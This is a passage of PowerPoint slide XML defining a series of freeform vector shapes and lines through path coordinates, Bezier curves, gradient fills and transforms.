                      <a:gd name="T7" fmla="*/ 780 h 915"/>
                      <a:gd name="T8" fmla="*/ 2069 w 3413"/>
                      <a:gd name="T9" fmla="*/ 915 h 915"/>
                      <a:gd name="T10" fmla="*/ 3413 w 3413"/>
                      <a:gd name="T11" fmla="*/ 551 h 915"/>
                      <a:gd name="T12" fmla="*/ 1344 w 3413"/>
                      <a:gd name="T13" fmla="*/ 0 h 9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413" h="915">
                        <a:moveTo>
                          <a:pt x="1344" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="364"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="721"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1564" y="780"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="2069" y="915"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3413" y="551"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="134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6" name="Freeform 620"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="573" y="3652"/>
                    <a:ext cx="1767" cy="1417"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 747 w 748"/>
                      <a:gd name="T1" fmla="*/ 446 h 600"/>
                      <a:gd name="T2" fmla="*/ 647 w 748"/>
                      <a:gd name="T3" fmla="*/ 113 h 600"/>
                      <a:gd name="T4" fmla="*/ 569 w 748"/>
                      <a:gd name="T5" fmla="*/ 0 h 600"/>
                      <a:gd name="T6" fmla="*/ 0 w 748"/>
                      <a:gd name="T7" fmla="*/ 154 h 600"/>
                      <a:gd name="T8" fmla="*/ 78 w 748"/>
                      <a:gd name="T9" fmla="*/ 267 h 600"/>
                      <a:gd name="T10" fmla="*/ 178 w 748"/>
                      <a:gd name="T11" fmla="*/ 600 h 600"/>
                      <a:gd name="T12" fmla="*/ 748 w 748"/>
                      <a:gd name="T13" fmla="*/ 447 h 600"/>
                      <a:gd name="T14" fmla="*/ 747 w 748"/>
                      <a:gd name="T15" fmla="*/ 446 h 6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48" h="600">
                        <a:moveTo>
                          <a:pt x="747" y="446"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="647" y="113"/>
                          <a:pt x="647" y="113"/>
                          <a:pt x="647" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="647" y="113"/>
                          <a:pt x="626" y="18"/>
                          <a:pt x="569" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="154"/>
                          <a:pt x="0" y="154"/>
                          <a:pt x="0" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="58" y="171"/>
                          <a:pt x="78" y="267"/>
                          <a:pt x="78" y="267"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="178" y="600"/>
                          <a:pt x="178" y="600"/>
                          <a:pt x="178" y="600"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="748" y="447"/>
                          <a:pt x="748" y="447"/>
                          <a:pt x="748" y="447"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="747" y="447"/>
                          <a:pt x="747" y="446"/>
                          <a:pt x="747" y="44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7" name="Line 621"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="-1227" y="3392"/>
                    <a:ext cx="2067" cy="55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8" name="Line 622"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="-960" y="3321"/>
                    <a:ext cx="2067" cy="550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9" name="Line 623"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="-693" y="3248"/>
                    <a:ext cx="2067" cy="550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0" name="Line 624"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1" flipV="1">
                    <a:off x="-426" y="3177"/>
                    <a:ext cx="2067" cy="550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1" name="Freeform 625"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-1399" y="3708"/>
                    <a:ext cx="1443" cy="1106"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1443"/>
                      <a:gd name="T1" fmla="*/ 0 h 1106"/>
                      <a:gd name="T2" fmla="*/ 0 w 1443"/>
                      <a:gd name="T3" fmla="*/ 721 h 1106"/>
                      <a:gd name="T4" fmla="*/ 1443 w 1443"/>
                      <a:gd name="T5" fmla="*/ 1106 h 1106"/>
                      <a:gd name="T6" fmla="*/ 1443 w 1443"/>
                      <a:gd name="T7" fmla="*/ 385 h 1106"/>
                      <a:gd name="T8" fmla="*/ 0 w 1443"/>
                      <a:gd name="T9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43" h="1106">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="721"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1443" y="1106"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1443" y="38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2" name="Freeform 626"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="141" y="4119"/>
                    <a:ext cx="581" cy="1534"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 581 w 581"/>
                      <a:gd name="T1" fmla="*/ 154 h 1534"/>
                      <a:gd name="T2" fmla="*/ 0 w 581"/>
                      <a:gd name="T3" fmla="*/ 0 h 1534"/>
                      <a:gd name="T4" fmla="*/ 0 w 581"/>
                      <a:gd name="T5" fmla="*/ 1470 h 1534"/>
                      <a:gd name="T6" fmla="*/ 236 w 581"/>
                      <a:gd name="T7" fmla="*/ 1534 h 1534"/>
                      <a:gd name="T8" fmla="*/ 572 w 581"/>
                      <a:gd name="T9" fmla="*/ 1035 h 1534"/>
                      <a:gd name="T10" fmla="*/ 581 w 581"/>
                      <a:gd name="T11" fmla="*/ 154 h 15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581" h="1534">
                        <a:moveTo>
                          <a:pt x="581" y="154"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="1470"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="236" y="1534"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="572" y="1035"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="581" y="154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3" name="Freeform 627"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="753" y="4370"/>
                    <a:ext cx="210" cy="692"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 210 w 210"/>
                      <a:gd name="T1" fmla="*/ 692 h 692"/>
                      <a:gd name="T2" fmla="*/ 0 w 210"/>
                      <a:gd name="T3" fmla="*/ 635 h 692"/>
                      <a:gd name="T4" fmla="*/ 4 w 210"/>
                      <a:gd name="T5" fmla="*/ 0 h 692"/>
                      <a:gd name="T6" fmla="*/ 210 w 210"/>
                      <a:gd name="T7" fmla="*/ 692 h 6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10" h="692">
                        <a:moveTo>
                          <a:pt x="210" y="692"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="635"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="4" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="210" y="692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3399FF">
                          <a:gamma/>
                          <a:tint val="28235"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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4" name="Freeform 628"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="231" y="4238"/>
                    <a:ext cx="451" cy="749"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 451"/>
                      <a:gd name="T1" fmla="*/ 0 h 749"/>
                      <a:gd name="T2" fmla="*/ 0 w 451"/>
                      <a:gd name="T3" fmla="*/ 626 h 749"/>
                      <a:gd name="T4" fmla="*/ 451 w 451"/>
                      <a:gd name="T5" fmla="*/ 749 h 749"/>
                      <a:gd name="T6" fmla="*/ 451 w 451"/>
                      <a:gd name="T7" fmla="*/ 120 h 749"/>
                      <a:gd name="T8" fmla="*/ 0 w 451"/>
                      <a:gd name="T9" fmla="*/ 0 h 7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1" h="749">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="626"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="451" y="749"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="451" y="12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3399FF">
                          <a:gamma/>
                          <a:tint val="28235"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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Freeform 629"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="781" y="3930"/>
                    <a:ext cx="1533" cy="1134"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 234 w 1533"/>
                      <a:gd name="T1" fmla="*/ 1134 h 1134"/>
                      <a:gd name="T2" fmla="*/ 0 w 1533"/>
                      <a:gd name="T3" fmla="*/ 348 h 1134"/>
                      <a:gd name="T4" fmla="*/ 1302 w 1533"/>
                      <a:gd name="T5" fmla="*/ 0 h 1134"/>
                      <a:gd name="T6" fmla="*/ 1533 w 1533"/>
                      <a:gd name="T7" fmla="*/ 785 h 1134"/>
                      <a:gd name="T8" fmla="*/ 234 w 1533"/>
                      <a:gd name="T9" fmla="*/ 1134 h 1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33" h="1134">
                        <a:moveTo>
                          <a:pt x="234" y="1134"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="348"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1302" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1533" y="785"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="234" y="1134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3399FF">
                          <a:gamma/>
                          <a:tint val="28235"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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Freeform 630"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="994" y="4708"/>
                    <a:ext cx="1594" cy="1150"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 659 w 675"/>
                      <a:gd name="T1" fmla="*/ 47 h 487"/>
                      <a:gd name="T2" fmla="*/ 570 w 675"/>
                      <a:gd name="T3" fmla="*/ 0 h 487"/>
                      <a:gd name="T4" fmla="*/ 0 w 675"/>
                      <a:gd name="T5" fmla="*/ 153 h 487"/>
                      <a:gd name="T6" fmla="*/ 63 w 675"/>
                      <a:gd name="T7" fmla="*/ 180 h 487"/>
                      <a:gd name="T8" fmla="*/ 90 w 675"/>
                      <a:gd name="T9" fmla="*/ 201 h 487"/>
                      <a:gd name="T10" fmla="*/ 90 w 675"/>
                      <a:gd name="T11" fmla="*/ 487 h 487"/>
                      <a:gd name="T12" fmla="*/ 659 w 675"/>
                      <a:gd name="T13" fmla="*/ 337 h 487"/>
                      <a:gd name="T14" fmla="*/ 659 w 675"/>
                      <a:gd name="T15" fmla="*/ 47 h 4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675" h="487">
                        <a:moveTo>
                          <a:pt x="659" y="47"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="644" y="26"/>
                          <a:pt x="581" y="4"/>
                          <a:pt x="570" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="153"/>
                          <a:pt x="0" y="153"/>
                          <a:pt x="0" y="153"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="153"/>
                          <a:pt x="35" y="165"/>
                          <a:pt x="63" y="180"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="75" y="187"/>
                          <a:pt x="85" y="194"/>
                          <a:pt x="90" y="201"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="106" y="224"/>
                          <a:pt x="90" y="487"/>
                          <a:pt x="90" y="487"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="659" y="337"/>
                          <a:pt x="659" y="337"/>
                          <a:pt x="659" y="337"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="659" y="337"/>
                          <a:pt x="675" y="71"/>
                          <a:pt x="659" y="47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7" name="Freeform 631"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1289" y="5204"/>
                    <a:ext cx="168" cy="220"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 168"/>
                      <a:gd name="T1" fmla="*/ 220 h 220"/>
                      <a:gd name="T2" fmla="*/ 0 w 168"/>
                      <a:gd name="T3" fmla="*/ 45 h 220"/>
                      <a:gd name="T4" fmla="*/ 168 w 168"/>
                      <a:gd name="T5" fmla="*/ 0 h 220"/>
                      <a:gd name="T6" fmla="*/ 168 w 168"/>
                      <a:gd name="T7" fmla="*/ 175 h 220"/>
                      <a:gd name="T8" fmla="*/ 0 w 168"/>
                      <a:gd name="T9" fmla="*/ 220 h 2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8" h="220">
                        <a:moveTo>
                          <a:pt x="0" y="220"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="175"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="22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B7DBFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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8" name="Freeform 632"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2321" y="4927"/>
                    <a:ext cx="168" cy="218"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 168"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 168"/>
                      <a:gd name="T3" fmla="*/ 45 h 218"/>
                      <a:gd name="T4" fmla="*/ 168 w 168"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 168 w 168"/>
                      <a:gd name="T7" fmla="*/ 173 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 168"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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8" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="173"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="21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B7DBFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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9" name="Freeform 633"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1289" y="5445"/>
                    <a:ext cx="168" cy="125"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 168"/>
                      <a:gd name="T1" fmla="*/ 125 h 125"/>
                      <a:gd name="T2" fmla="*/ 0 w 168"/>
                      <a:gd name="T3" fmla="*/ 45 h 125"/>
                      <a:gd name="T4" fmla="*/ 168 w 168"/>
                      <a:gd name="T5" fmla="*/ 0 h 125"/>
                      <a:gd name="T6" fmla="*/ 168 w 168"/>
                      <a:gd name="T7" fmla="*/ 80 h 125"/>
                      <a:gd name="T8" fmla="*/ 0 w 168"/>
                      <a:gd name="T9" fmla="*/ 125 h 1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8" h="125">
                        <a:moveTo>
                          <a:pt x="0" y="125"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="80"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="125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FFC269"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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0" name="Freeform 634"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2321" y="5166"/>
                    <a:ext cx="168" cy="128"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 168"/>
                      <a:gd name="T1" fmla="*/ 128 h 128"/>
                      <a:gd name="T2" fmla="*/ 0 w 168"/>
                      <a:gd name="T3" fmla="*/ 45 h 128"/>
                      <a:gd name="T4" fmla="*/ 168 w 168"/>
                      <a:gd name="T5" fmla="*/ 0 h 128"/>
                      <a:gd name="T6" fmla="*/ 168 w 168"/>
                      <a:gd name="T7" fmla="*/ 83 h 128"/>
                      <a:gd name="T8" fmla="*/ 0 w 168"/>
                      <a:gd name="T9" fmla="*/ 128 h 1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8" h="128">
                        <a:moveTo>
                          <a:pt x="0" y="128"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="168" y="83"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="12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FFC269"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="27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1" name="Freeform 635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542" y="4961"/>
                    <a:ext cx="678" cy="656"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 678"/>
                      <a:gd name="T1" fmla="*/ 186 h 656"/>
                      <a:gd name="T2" fmla="*/ 0 w 678"/>
                      <a:gd name="T3" fmla="*/ 394 h 656"/>
                      <a:gd name="T4" fmla="*/ 678 w 678"/>
                      <a:gd name="T5" fmla="*/ 212 h 656"/>
                      <a:gd name="T6" fmla="*/ 678 w 678"/>
                      <a:gd name="T7" fmla="*/ 0 h 656"/>
                      <a:gd name="T8" fmla="*/ 0 w 678"/>
                      <a:gd name="T9" fmla="*/ 186 h 656"/>
                      <a:gd name="T10" fmla="*/ 0 w 678"/>
                      <a:gd name="T11" fmla="*/ 656 h 656"/>
                      <a:gd name="T12" fmla="*/ 678 w 678"/>
                      <a:gd name="T13" fmla="*/ 470 h 656"/>
                      <a:gd name="T14" fmla="*/ 678 w 678"/>
                      <a:gd name="T15" fmla="*/ 278 h 656"/>
                      <a:gd name="T16" fmla="*/ 0 w 678"/>
                      <a:gd name="T17" fmla="*/ 460 h 656"/>
                      <a:gd name="T18" fmla="*/ 0 w 678"/>
                      <a:gd name="T19" fmla="*/ 656 h 6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678" h="656">
                        <a:moveTo>
                          <a:pt x="0" y="186"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="394"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="678" y="212"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="678" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="186"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="0" y="656"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="678" y="470"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="678" y="278"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="460"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="65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2" name="Freeform 636"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1076" y="5372"/>
                    <a:ext cx="1491" cy="534"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 630 w 631"/>
                      <a:gd name="T1" fmla="*/ 2 h 226"/>
                      <a:gd name="T2" fmla="*/ 627 w 631"/>
                      <a:gd name="T3" fmla="*/ 0 h 226"/>
                      <a:gd name="T4" fmla="*/ 627 w 631"/>
                      <a:gd name="T5" fmla="*/ 5 h 226"/>
                      <a:gd name="T6" fmla="*/ 434 w 631"/>
                      <a:gd name="T7" fmla="*/ 58 h 226"/>
                      <a:gd name="T8" fmla="*/ 234 w 631"/>
                      <a:gd name="T9" fmla="*/ 115 h 226"/>
                      <a:gd name="T10" fmla="*/ 0 w 631"/>
                      <a:gd name="T11" fmla="*/ 149 h 226"/>
                      <a:gd name="T12" fmla="*/ 0 w 631"/>
                      <a:gd name="T13" fmla="*/ 198 h 226"/>
                      <a:gd name="T14" fmla="*/ 234 w 631"/>
                      <a:gd name="T15" fmla="*/ 165 h 226"/>
                      <a:gd name="T16" fmla="*/ 434 w 631"/>
                      <a:gd name="T17" fmla="*/ 108 h 226"/>
                      <a:gd name="T18" fmla="*/ 610 w 631"/>
                      <a:gd name="T19" fmla="*/ 61 h 226"/>
                      <a:gd name="T20" fmla="*/ 610 w 631"/>
                      <a:gd name="T21" fmla="*/ 61 h 226"/>
                      <a:gd name="T22" fmla="*/ 610 w 631"/>
                      <a:gd name="T23" fmla="*/ 61 h 226"/>
                      <a:gd name="T24" fmla="*/ 627 w 631"/>
                      <a:gd name="T25" fmla="*/ 55 h 226"/>
                      <a:gd name="T26" fmla="*/ 630 w 631"/>
                      <a:gd name="T27" fmla="*/ 51 h 226"/>
                      <a:gd name="T28" fmla="*/ 630 w 631"/>
                      <a:gd name="T29" fmla="*/ 2 h 2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631" h="226">
                        <a:moveTo>
                          <a:pt x="630" y="2"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="630" y="1"/>
                          <a:pt x="629" y="0"/>
                          <a:pt x="627" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="627" y="5"/>
                          <a:pt x="627" y="5"/>
                          <a:pt x="627" y="5"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="604" y="16"/>
                          <a:pt x="492" y="42"/>
                          <a:pt x="434" y="58"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="374" y="75"/>
                          <a:pt x="289" y="99"/>
                          <a:pt x="234" y="115"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="178" y="131"/>
                          <a:pt x="39" y="174"/>
                          <a:pt x="0" y="149"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="198"/>
                          <a:pt x="0" y="198"/>
                          <a:pt x="0" y="198"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="39" y="226"/>
                          <a:pt x="178" y="181"/>
                          <a:pt x="234" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="289" y="149"/>
                          <a:pt x="374" y="125"/>
                          <a:pt x="434" y="108"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="483" y="94"/>
                          <a:pt x="570" y="74"/>
                          <a:pt x="610" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="610" y="61"/>
                          <a:pt x="610" y="61"/>
                          <a:pt x="610" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="610" y="61"/>
                          <a:pt x="610" y="61"/>
                          <a:pt x="610" y="61"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="616" y="59"/>
                          <a:pt x="627" y="55"/>
                          <a:pt x="627" y="55"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="629" y="53"/>
                          <a:pt x="631" y="52"/>
                          <a:pt x="630" y="51"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="630" y="2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3" name="Freeform 637"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="552" y="4495"/>
                    <a:ext cx="165" cy="484"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 165"/>
                      <a:gd name="T1" fmla="*/ 484 h 484"/>
                      <a:gd name="T2" fmla="*/ 0 w 165"/>
                      <a:gd name="T3" fmla="*/ 45 h 484"/>
                      <a:gd name="T4" fmla="*/ 165 w 165"/>
                      <a:gd name="T5" fmla="*/ 0 h 484"/>
                      <a:gd name="T6" fmla="*/ 165 w 165"/>
                      <a:gd name="T7" fmla="*/ 440 h 484"/>
                      <a:gd name="T8" fmla="*/ 0 w 165"/>
                      <a:gd name="T9" fmla="*/ 484 h 4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5" h="484">
                        <a:moveTo>
                          <a:pt x="0" y="484"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="45"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="165" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="165" y="440"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="484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4" name="Freeform 638"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="519" y="4533"/>
                    <a:ext cx="33" cy="446"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 33 w 33"/>
                      <a:gd name="T1" fmla="*/ 7 h 446"/>
                      <a:gd name="T2" fmla="*/ 0 w 33"/>
                      <a:gd name="T3" fmla="*/ 0 h 446"/>
                      <a:gd name="T4" fmla="*/ 0 w 33"/>
                      <a:gd name="T5" fmla="*/ 439 h 446"/>
                      <a:gd name="T6" fmla="*/ 33 w 33"/>
                      <a:gd name="T7" fmla="*/ 446 h 446"/>
                      <a:gd name="T8" fmla="*/ 33 w 33"/>
                      <a:gd name="T9" fmla="*/ 7 h 4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446">
                        <a:moveTo>
                          <a:pt x="33" y="7"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="439"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="446"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="7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5" name="Freeform 639"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="519" y="4488"/>
                    <a:ext cx="198" cy="52"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
